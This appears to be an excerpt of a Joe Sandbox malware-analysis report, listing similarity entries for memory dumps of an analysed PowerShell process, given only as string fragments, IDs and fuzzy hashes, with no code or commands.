                                                                Similarity
                                                                • API ID:
                                                                • String ID: (okq$(okq$(okq$(okq
                                                                • API String ID: 0-1817140900
                                                                • Opcode ID: 4e087b51e3f1d687f3a34c31a0967ffcc11ea22bedc7905bdd7152ad2127061c
                                                                • Instruction ID: 50e2d6f7628a69440d491e549b9e13872d110fe5372eb4f2ccec3eb10e2bd647
                                                                • Opcode Fuzzy Hash: 4e087b51e3f1d687f3a34c31a0967ffcc11ea22bedc7905bdd7152ad2127061c
                                                                • Instruction Fuzzy Hash: 63F108B170430EDFDB168E68DA0076ABBA2AF86390F14887AE615CB391DB35D845C771
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 84!l$84!l$tPkq$tPkq
                                                                • API String ID: 0-3344138037
                                                                • Opcode ID: 8f94c7191fdeb923482338f0cd8c219d6b054d6dd661e649fb7c70eb14b894f5
                                                                • Instruction ID: 16296254ef7ddd03e8a6616f0d5f40ffa682382f58c6ed896b22c9de1e44cb3e
                                                                • Opcode Fuzzy Hash: 8f94c7191fdeb923482338f0cd8c219d6b054d6dd661e649fb7c70eb14b894f5
                                                                • Instruction Fuzzy Hash: DE913DB17002869FCB249E69CA50B7BBBE2AFC5350F28C86ADA45DF395CA35DC40C751
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$XY#l$XY#l
                                                                • API String ID: 0-4060309308
                                                                • Opcode ID: d9e65deb037e0e48b5228f64e4939c853b72ec06deb7af535caf940a3188a22d
                                                                • Instruction ID: 667f10070551a01440aa0b916386fba1eb138673d9203b5471194fa18484f3c9
                                                                • Opcode Fuzzy Hash: d9e65deb037e0e48b5228f64e4939c853b72ec06deb7af535caf940a3188a22d
                                                                • Instruction Fuzzy Hash: F4815AB170534A8FCB218B789A0066ABFA2AFC6250F24C8BBD645CB353D631C845C7A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$(f#l$(f#l
                                                                • API String ID: 0-2541482469
                                                                • Opcode ID: a3cd7296e552e15da3fa0af61cfb53cf61065e16f06ab0b5dc4555d45598ee18
                                                                • Instruction ID: c533881bb077de5c234ed21f1e97c6b0e77e522e0be5ef8b9c2bd02d7dd98bad
                                                                • Opcode Fuzzy Hash: a3cd7296e552e15da3fa0af61cfb53cf61065e16f06ab0b5dc4555d45598ee18
                                                                • Instruction Fuzzy Hash: C8718DB0A00209DFDB14CF58CA51A6EBBB2BF89350F148569D914AB365CB32EC45CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$4'kq$4 l
                                                                • API String ID: 0-2645944089
                                                                • Opcode ID: 7bb42d78c72f713cb3db61070bd9aaf248da9c5330c63e4753f7b51815b5a431
                                                                • Instruction ID: fd811044b2847bfcfd43565fba643e43a23539f3eaac33649c443d0d02efe1a2
                                                                • Opcode Fuzzy Hash: 7bb42d78c72f713cb3db61070bd9aaf248da9c5330c63e4753f7b51815b5a431
                                                                • Instruction Fuzzy Hash: 2F6192F0A01305DFCB14CF58C655E6ABBB2BF86350F188569EA05AB365CB72E841CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $kq$$kq$$kq$$kq
                                                                • API String ID: 0-2881790790
                                                                • Opcode ID: fd144964635e1e31cd2bda2a8840bfff89e946505262fc9d2ea8d30dcc90be49
                                                                • Instruction ID: ba86a7d51d03b62357c8cb6eff1d396eeb384e839e5ccc0dc0efb34c19dea229
                                                                • Opcode Fuzzy Hash: fd144964635e1e31cd2bda2a8840bfff89e946505262fc9d2ea8d30dcc90be49
                                                                • Instruction Fuzzy Hash: 152147B172024EDBDB34957A9E00B27A7DA9BC0395FB48C2AA605CB381DD3AC8418361
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$$kq$$kq
                                                                • API String ID: 0-1727931526
                                                                • Opcode ID: 5c8ce61fbd14c343861d14c53691d04eae3374d75d14b2a06c06a16669b7ad77
                                                                • Instruction ID: e201ab55577a8c10cf74ef78e48e22430f580dbfe85d5287cacf4f2146558cd0
                                                                • Opcode Fuzzy Hash: 5c8ce61fbd14c343861d14c53691d04eae3374d75d14b2a06c06a16669b7ad77
                                                                • Instruction Fuzzy Hash: B801756160A3DA9FC73A172858202666FB25FD3550B3905EBC584DB397CD198C1683A6